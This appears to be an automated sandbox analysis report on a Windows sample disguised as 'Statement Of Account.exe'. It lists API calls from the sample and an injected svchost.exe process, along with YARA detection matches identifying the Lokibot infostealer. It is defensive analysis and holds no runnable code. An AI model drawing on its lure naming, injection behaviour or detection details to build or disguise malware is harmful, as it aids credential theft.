Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00447B15 NtdllDialogWndProc_W,	0_2_00447B15
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00440B39 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	0_2_00440B39
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00454C69 NtdllDialogWndProc_W,	0_2_00454C69
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00454C1B NtdllDialogWndProc_W,	0_2_00454C1B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00461EB0 NtdllDialogWndProc_W,NtdllDialogWndProc_W,	0_2_00461EB0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00401108 NtdllDefWindowProc_W,	3_2_00401108
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	3_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0040116E NtdllDefWindowProc_W,	3_2_0040116E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00401108 NtdllDefWindowProc_W,	3_2_00401108
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004331D9 ClientToScreen,NtdllDialogWndProc_W,	3_2_004331D9
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047E1FA NtdllDialogWndProc_W,	3_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0043323E GetWindowLongW,NtdllDialogWndProc_W,	3_2_0043323E
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0046F2B0 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	3_2_0046F2B0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0046F50B NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	3_2_0046F50B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0045058D GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W,	3_2_0045058D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00469681 PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	3_2_00469681
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0046F749 NtdllDialogWndProc_W,	3_2_0046F749
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00447870 GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx,	3_2_00447870
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044782B NtdllDialogWndProc_W,	3_2_0044782B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044096A NtdllDialogWndProc_W,	3_2_0044096A
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044796B GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W,	3_2_0044796B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00440938 NtdllDialogWndProc_W,	3_2_00440938
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00469995 NtdllDialogWndProc_W,NtdllDialogWndProc_W,	3_2_00469995
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0044099C NtdllDialogWndProc_W,	3_2_0044099C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00440ADF NtdllDialogWndProc_W,	3_2_00440ADF
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00447A87 SendMessageW,NtdllDialogWndProc_W,	3_2_00447A87
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00447B15 NtdllDialogWndProc_W,	3_2_00447B15
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00440B39 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	3_2_00440B39
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00454C69 NtdllDialogWndProc_W,	3_2_00454C69
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00454C1B NtdllDialogWndProc_W,	3_2_00454C1B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00461EB0 NtdllDialogWndProc_W,NtdllDialogWndProc_W,	3_2_00461EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00122720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	10_2_00122720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00123540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_001233C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	10_2_001233C0

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00434D50

Source: C:\Users\user\Desktop\Statement Of Account.exe

Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,74AE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_004461ED

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004364AA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		3_2_004364AA

Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00409A40	0_2_00409A40
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00412038	0_2_00412038
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00427161	0_2_00427161
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047E1FA	0_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004212BE	0_2_004212BE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00443390	0_2_00443390
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00443391	0_2_00443391
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0041A46B	0_2_0041A46B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0041240C	0_2_0041240C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00446566	0_2_00446566
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0041D750	0_2_0041D750
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_004037E0	0_2_004037E0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00427859	0_2_00427859
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00412818	0_2_00412818
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0040F890	0_2_0040F890
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0042397B	0_2_0042397B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00411B63	0_2_00411B63
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0047CBF0	0_2_0047CBF0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00412C38	0_2_00412C38
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00423EBF	0_2_00423EBF
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_00424F70	0_2_00424F70
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_0041AF0D	0_2_0041AF0D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 0_2_03E4F238	0_2_03E4F238
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00409A40	3_2_00409A40
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00412038	3_2_00412038
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00427161	3_2_00427161
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047E1FA	3_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004212BE	3_2_004212BE
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00443390	3_2_00443390
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00443391	3_2_00443391
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0041A46B	3_2_0041A46B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0041240C	3_2_0041240C
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00446566	3_2_00446566
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0041D750	3_2_0041D750
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_004037E0	3_2_004037E0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00427859	3_2_00427859
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00412818	3_2_00412818
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0040F890	3_2_0040F890
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0042397B	3_2_0042397B
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00411B63	3_2_00411B63
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0047CBF0	3_2_0047CBF0
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00412C38	3_2_00412C38
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00423EBF	3_2_00423EBF
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_00424F70	3_2_00424F70
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_0041AF0D	3_2_0041AF0D
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 3_2_03D5C228	3_2_03D5C228
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 5_2_03C7E608	5_2_03C7E608
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 7_2_03E2C238	7_2_03E2C238
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: 9_2_03D7C600	9_2_03D7C600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_00122720	10_2_00122720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_0040549C	10_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_004029D4	10_2_004029D4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 00425210 appears 58 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 0041718C appears 90 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\Desktop\Statement Of Account.exe	Code function: String function: 0043362D appears 38 times

Source: Statement Of Account.exe, 00000000.00000003.2057153434.0000000004443000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000045ED000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000003.00000003.2076232041.0000000004353000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000003.00000003.2077015331.00000000044FD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000005.00000003.2101916885.000000000450D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000005.00000003.2101706844.0000000004363000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000007.00000003.2120319817.0000000004423000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000007.00000003.2119966294.00000000045CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000009.00000003.2137835817.0000000004423000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000009.00000003.2138006449.00000000045CD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe

Source: Statement Of Account.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.Statement Of Account.exe.2eb0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
